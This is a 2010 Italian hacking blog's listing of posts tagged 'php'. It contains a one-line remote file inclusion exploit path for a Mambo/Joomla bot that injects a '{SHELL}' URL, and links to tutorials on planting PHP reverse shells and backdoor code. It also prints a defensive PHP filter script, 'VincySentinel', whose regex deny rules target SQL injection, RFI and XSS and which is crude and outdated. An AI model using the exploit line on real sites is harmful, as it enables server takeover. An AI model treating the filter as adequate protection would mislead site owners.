Articoli marcati con tag ‘php’
16 marzo 2010 | 
Autore: http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}
XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=
Pubblicato in 
Tag: 
Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei contenuti) e come ogni CMS che si rispetti (ormai è difficile trovare CMS senza vulnerabilità 
) ha qualche falla 
Quella che vi presento oggi è una falla nel modulo Top.Di seguito trovate il codice 
Video tutorial che illustra come effettuare RCE (Remote Command Execution) su un web server su cui è presente una pagina PHP vulnerabile a RFI (Remote File Inclusion), ovvero con funzioni per l'inclusione di file con input a discrezione dall'utente e non validato. In questo caso, osserveremo la pericolosità di questa vulnerabilità, esaminando come è possibile iniettare una reverse shell scritta in PHP e inviare quindi comandi arbitrari all'host.
Link per il download: http://www.mediafire.com/?njszestd3zo
Crediti: Vincy
Per chi non sapesse cosa sia una Backdoor riporto la citazione di wikipedia:
Le backdoor in informatica sono paragonabili a porte di servizio (cioè le porte del retro) che consentono di superare in parte o in tutto le procedure di sicurezza attivate in un sistema informatico.
Cliccando qui trovi il codice completo della backdoor. Mi auguro sia utile,e ovviamente è tutto a scopo informativo e didattico.
Michele
Video tutorial che illustra come iniettare una shell PHP su un server web avente uno script che effettua il logging su un file PHP che è possibile richiamare in maniera diretta via browser (log poisoning).
Download: clicca quì
Crediti: Vincy
Michele
Il mio caro amico Vincy ha codato da tempo un nuovo Sentinel che blocca molte intrusioni ai vostri sistemi.
Funziona su molti CMS,anche se su qualcuno lavora male.
Di seguito trovate il codice dello script.
Per installarlo sul vostro sistema basta copiare il seguente codice in un file .php e fare l'upload sul vostro spazio web 
<?php
# VincySentinel
# Blocca: SQL Injection, RFI, LFI, RCE e XSS.
# Anti CSRF.
# Analizza tutte le richieste: POST, GET e COOKIE.
# Blocca alcune connessioni eseguite da codice Perl.// Info
$pagina = $_SERVER['PHP_SELF'];
$ip = $_SERVER['REMOTE_ADDR'];
$useragent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$host = $_SERVER['HTTP_HOST'];// Rules
$maligno = array();
$maligno[] = "/union.+(all).?+select.+from.+(where)?.+/i";
$maligno[] = "/insert.+into.+value.+/i";
$maligno[] = "/(–|drop|alter|create)/i";
$maligno[] = "/(http|ftp|https)\:\/\/(www\.)?.+\.[A-Za-z]{1,4}/i";
$maligno[] = "/(img|script|alert|frameset|iframe|frame)/i";
$maligno[] = "/\.+\//i";// Anti Script Kiddie
$perlagent = "libwww-perl";
if(eregi($perlagent, $useragent))
{
die();
}// Anti CSRF
$post = implode("", $_POST);
if($post)
{
$host = str_replace("\.", ".", $host);
if (!eregi("^http\://(www\.)?".$host, $referer))
{
die("CSRF attempt");
}
}// Analisi Richieste
foreach($_REQUEST as $request)
{
foreach($maligno as $cattivo)
{
if(preg_match($cattivo, urldecode($request)))
{
die("Hacking Attempt<br>Your IP have been logged");
}
}
}# VincySentinel
?>
Michele
Utile script in PHP che protegge il vostro forum in phpbb dai seguenti attacchi:
- XSS
- SQL Injection
- Exploit
Clicca qui per vedere le modifiche da apportare al vostro CMS.
Michele
